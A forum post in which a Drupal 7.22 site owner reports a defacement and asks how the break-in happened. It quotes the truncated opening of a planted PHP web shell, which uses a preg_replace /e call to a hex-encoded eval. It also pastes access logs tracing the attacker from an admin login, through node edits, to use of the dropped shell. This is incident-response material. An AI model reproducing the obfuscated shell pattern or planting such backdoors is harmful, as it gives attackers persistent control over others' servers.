Site hacked: HACKED BY ARAB WARRIORS TEAM


SergeyB, 22 December 2014 at 15:02

My site was hacked, Drupal 7.22.

After the hack it looked like this: http://drupalir.com/node/62 (this is not my site); a screenshot is attached.
On 19 December at 10:19 a file named Anonriad.php appeared in the root, and index.php was replaced.

Yes, it's my own fault: I hadn't updated. I'm asking for help: is it possible to determine how the site was broken into, and what measures should I take (what to clean up and check, and where) before updating?

Thanks!

Contents of Anonriad.php:

<?php #v2.3 //Version
$auth_pass = ""; //75b43eac8d215582f6bcab4532eb854e
$color = "#25ff00"; //Colour
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x etc.

Logs at the time of the hack, from IP 95.212.150.178 - - [19/Dec/2014:10:16:13 +0200]

[10:16:13] "GET /user/login HTTP/1.0" 200 6637 "http://www.notascent.co.il/sites/all/themes/riada/css/exploit.php?url=si..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/css/css_791YXBaKKm1ORM_7huSKEsIV9tSWq6wmRkERhuXpN6w.css HTTP/1.0" 200 1902 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/css/css_NqhgInM0lTgqO7vX0jh4qaY-WxBl70tE1_C8Vk_uuD4.css HTTP/1.0" 200 1219 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/css/css_2JBDoKBVeptGkqRr7EWXMy6YH0C_gyqI9SSEnrWXajw.css HTTP/1.0" 200 2445 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/css/css_i5RWKUXDQjEJ_HbNVTbHKenTisV2HJHBVdnERBImN9A.css HTTP/1.0" 200 6338 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/js/js_xAPl0qIk9eowy_iS9tNkCWXLUVoat94SQT48UBCFkyQ.js HTTP/1.0" 200 32743 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/js/js_LDA_hkHYO5oKj8zDCk7PX266O_ovBx08IKaZar1_pO0.js HTTP/1.0" 200 6981 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/js/js_qOffZi7JWom9r6Ekgjinr7QDy3A7CFqgvmUGdOgP8kY.js HTTP/1.0" 200 37674 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/qr-777rcing-small.png HTTP/1.0" 200 294 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/777_logo_250px.png HTTP/1.0" 200 8368 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/777rcing-qr.jpg HTTP/1.0" 200 25001 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/slides/recommendations/rec_slide3_ms.jpg HTTP/1.0" 200 5089 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/slides/recommendations/rec_slide2_tri.jpg HTTP/1.0" 200 4576 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/slides/recommendations/rec_slide1_dan.jpg HTTP/1.0" 200 5596 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/777rcing-price-calculator.png HTTP/1.0" 200 32494 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/all/themes/777/images/li-blue-circle.png HTTP/1.0" 200 177 "http://site.ru/sites/default/files/css/css_i5RWKUXDQjEJ_HbNVTbHKenTisV2H..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/all/libraries/superfish/images/arrows-777777.png HTTP/1.0" 200 289 "http://site.ru/sites/default/files/css/css_2JBDoKBVeptGkqRr7EWXMy6YH0C_g..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/all/libraries/superfish/images/shadow.png HTTP/1.0" 200 5891 "http://site.ru/sites/default/files/css/css_2JBDoKBVeptGkqRr7EWXMy6YH0C_g..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:16] "GET /sites/default/files/favicon.ico HTTP/1.0" 200 894 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:20] "POST /user/login HTTP/1.0" 302 20 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:21] "GET /user/1 HTTP/1.0" 200 8964 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/css/css_XfCdeEtKlbkG_tqfyKTegRl0fh651tkF-_sjnwRUm1o.css HTTP/1.0" 200 3028 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/css/css_Ik-aXOOAFZOQ1ZxF1J4K73SY-DdEiARJDW_4kZpx55k.css HTTP/1.0" 200 1066 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/all/modules/simplemeta/css/simplemeta.css?netw7s HTTP/1.0" 200 515 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/css/css_kk-FIzsCt8r3d1OiyOuXfbMl-3h41-tNcoziBFfsZ4U.css HTTP/1.0" 200 2580 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/js/js_efpgjZVoKE4yOllZ9x0H_iTGDnjuNhKpKoD8fm3mncg.js HTTP/1.0" 200 21401 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/js/js_nv2SaN8iSRRXw5oX7d3qhllIpa8K3-Y6Oi2H5cXGMG8.js HTTP/1.0" 200 10002 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/all/modules/simplemeta/js/simplemeta.js?netw7s HTTP/1.0" 200 417 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/js/js_EwEZFNkTWwJSuk-vmxKimqCmQnuKQJ0gIVmqcat7WhY.js HTTP/1.0" 200 28925 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:23] "GET /modules/toolbar/toolbar.png HTTP/1.0" 200 558 "http://site.ru/sites/default/files/css/css_kk-FIzsCt8r3d1OiyOuXfbMl-3h41..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:23] "GET /sites/all/modules/simplemeta/css/img/buttons.png HTTP/1.0" 200 5492 "http://site.ru/sites/all/modules/simplemeta/css/simplemeta.css?netw7s" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:23] "GET /modules/contextual/images/gear-select.png HTTP/1.0" 200 506 "http://site.ru/sites/default/files/css/css_XfCdeEtKlbkG_tqfyKTegRl0fh651..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:23] "GET /misc/grippie.png HTTP/1.0" 200 106 "http://site.ru/sites/default/files/css/css_791YXBaKKm1ORM_7huSKEsIV9tSWq..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:00] "GET /modules/overlay/images/background.png HTTP/1.0" 200 76 "http://site.ru/sites/default/files/css/css_XfCdeEtKlbkG_tqfyKTegRl0fh651..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:00] "GET /admin/appearance?render=overlay HTTP/1.0" 200 4598 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/css/css_pbm0lsQQJ7A7WCCIMgxLho6mI_kBNgznNUWmTWcnfoE.css HTTP/1.0" 200 2217 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/css/css_vdCzpt5RRVtDzGpF94dcgdqUpCnRccmWqw97zGgqJww.css HTTP/1.0" 200 1759 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/css/css_0qCS2kFs9-L8lHJ6UchvAHBOijP5qjMPv6-clk_9gRk.css HTTP/1.0" 200 801 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/css/css_ABmXGW3jlpNaBRmWVTJUFNYGbVFnilqYg_EngwXFiNc.css HTTP/1.0" 200 4233 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/js/js_E4YhD4qHwDovSkAi8qE7do-fbLhkuj5EPh68sqR8Y14.js HTTP/1.0" 200 9522 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/js/js_RLqP2t_5MASj5Rd5ZTKq8JOfRv7xocVdIA3yAsCtBSU.js HTTP/1.0" 200 7043 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/all/themes/777/screenshot.png HTTP/1.0" 200 8883 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/bartik/screenshot.png HTTP/1.0" 200 19658 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/seven/screenshot.png HTTP/1.0" 200 12298 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /sites/all/themes/zen/zen-internals/screenshot.png HTTP/1.0" 200 19703 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/garland/screenshot.png HTTP/1.0" 200 10950 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/stark/screenshot.png HTTP/1.0" 200 11662 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /modules/overlay/images/close.png HTTP/1.0" 200 344 "http://site.ru/sites/default/files/css/css_vdCzpt5RRVtDzGpF94dcgdqUpCnRc..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /modules/shortcut/shortcut.png HTTP/1.0" 200 558 "http://site.ru/sites/default/files/css/css_0qCS2kFs9-L8lHJ6UchvAHBOijP5q..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/seven/images/buttons.png HTTP/1.0" 200 786 "http://site.ru/sites/default/files/css/css_ABmXGW3jlpNaBRmWVTJUFNYGbVFni..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:11] "GET /node/add?render=overlay HTTP/1.0" 200 4156 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:11] "GET /sites/default/files/css/css_IufM3SZR_igg1vDPnOP9C4lSkbdQriNJqwaJ-DZ6kCE.css HTTP/1.0" 200 592 "http://site.ru/node/add?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:11] "GET /sites/default/files/js/js_n-x0O1ouYE1g5jLAcvRLZcXOhySqSiit2lVPa15ZHi8.js HTTP/1.0" 200 8796 "http://site.ru/node/add?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:11] "GET /sites/default/files/js/js_gvr-jG_Q3g1TUarJmaJrYi7jDqMYu-18anCVZ3I1tu4.js HTTP/1.0" 200 2656 "http://site.ru/node/add?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:12] "GET /themes/seven/images/list-item.png HTTP/1.0" 200 195 "http://site.ru/sites/default/files/css/css_ABmXGW3jlpNaBRmWVTJUFNYGbVFni..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:25] "GET /node/add/page?render=overlay HTTP/1.0" 200 8176 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/css/css_g6BHMTouiQTdbzWDEEGT2nkJX-QqclhtbzG6sUKituY.css HTTP/1.0" 200 2143 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/css/css_u8qTZdKW7Rm0mvCuvsDYjRHboV5_2oZ6vHslJTGAAlU.css HTTP/1.0" 200 314 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/css/css_B8i35bR64U0LArkCEWhw3wHXq-b4VJxsiGDLVttFpEk.css HTTP/1.0" 200 982 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_dTmtBQgE74lCSiMrQU6Fnk9MRQ4RteScgQvy0VIWcOA.js HTTP/1.0" 200 20236 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_Mf-zB6e4chGQAFxzz2XLBSe4F11Hq_fokY884ydCKlI.js HTTP/1.0" 200 4886 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_H0EH0osTSDdp8v3qSVqFJnWypUn64HU1ey4JwrbV1LQ.js HTTP/1.0" 200 474 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_hjLm09R05Wi45hhSJ-nFcEaJ-GfPjDMQk7VcibvfAD0.js HTTP/1.0" 200 12900 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/all/libraries/ckeditor/ckeditor.js?netw7s HTTP/1.0" 200 121172 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_loJJMZ-yLpCFnc5Htc8xgIMfdfNbw5E30CdocHWSiaM.js HTTP/1.0" 200 3027 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /misc/help.png HTTP/1.0" 200 294 "http://site.ru/sites/default/files/css/css_B8i35bR64U0LArkCEWhw3wHXq-b4V..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /misc/menu-collapsed.png HTTP/1.0" 200 105 "http://site.ru/sites/default/files/css/css_pbm0lsQQJ7A7WCCIMgxLho6mI_kBN..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /themes/seven/images/fc.png HTTP/1.0" 200 82 "http://site.ru/sites/default/files/css/css_g6BHMTouiQTdbzWDEEGT2nkJX-Qqc..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /misc/throbber.gif HTTP/1.0" 200 1336 "http://site.ru/sites/default/files/css/css_pbm0lsQQJ7A7WCCIMgxLho6mI_kBN..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /sites/all/libraries/ckeditor/skins/kama/editor.css?t=D03G5XL HTTP/1.0" 200 4748 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /sites/all/libraries/ckeditor/lang/ru.js?t=D03G5XL HTTP/1.0" 200 8972 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /themes/seven/reset.css HTTP/1.0" 200 1275 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /themes/seven/style.css HTTP/1.0" 200 4599 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /sites/all/modules/wysiwyg/plugins/break/images/break.gif?t=D03G5XL HTTP/1.0" 200 108 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /sites/all/libraries/ckeditor/skins/kama/icons.png HTTP/1.0" 200 5598 "http://site.ru/sites/all/libraries/ckeditor/skins/kama/editor.css?t=D03G5XL" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /sites/all/libraries/ckeditor/skins/kama/images/sprites.png HTTP/1.0" 200 7086 "http://site.ru/sites/all/libraries/ckeditor/skins/kama/editor.css?t=D03G5XL" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:29] "GET /sites/all/modules/wysiwyg/plugins/break/break.css HTTP/1.0" 200 171 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:30] "GET /sites/all/libraries/ckeditor/plugins/styles/styles/default.js?t=D03G5XL HTTP/1.0" 200 598 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:45] "POST /node/add/page?render=overlay&render=overlay HTTP/1.0" 302 20 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:46] "GET /node/31?render=overlay HTTP/1.0" 200 1381 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:47] "GET /sites/default/files/css/css_jZkqxuWbJ8MzqjtN8Ycm8FGV0G0FAAdhBlhtOsOlg_4.css HTTP/1.0" 200 811 "http://site.ru/node/31?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:47] "GET /sites/default/files/js/js_mjUi0wflDli413YNYoHkaJSZRTukOUe5MUVedh4ALAA.js HTTP/1.0" 200 2190 "http://site.ru/node/31?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:48] "GET /node/31 HTTP/1.0" 200 9318 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:49] "GET /misc/message-24-ok.png HTTP/1.0" 200 1058 "http://site.ru/sites/default/files/css/css_791YXBaKKm1ORM_7huSKEsIV9tSWq..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:58] "POST /node/31 HTTP/1.0" 200 9284 "http://site.ru/node/31" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:07] "POST /node/31 HTTP/1.0" 200 9292 "http://site.ru/node/31" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:14] "GET /Anonriad.php HTTP/1.0" 200 4457 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:15] "GET /favicon.ico HTTP/1.0" 404 234 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:16] "POST /Anonriad.php HTTP/1.0" 200 2581 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:23] "POST /Anonriad.php HTTP/1.0" 200 4457 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:28] "POST /Anonriad.php HTTP/1.0" 200 3145 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:20:59] "POST /Anonriad.php HTTP/1.0" 200 4460 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:07] "GET /riad.php HTTP/1.0" 200 832 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:12] "POST /Anonriad.php HTTP/1.0" 200 4422 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:14] "GET / HTTP/1.0" 200 10365 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:15] "GET /sites/default/files/slides/slide3_0.jpg HTTP/1.0" 200 60077 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:15] "GET /sites/default/files/slides/slide2.jpg HTTP/1.0" 200 62197 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
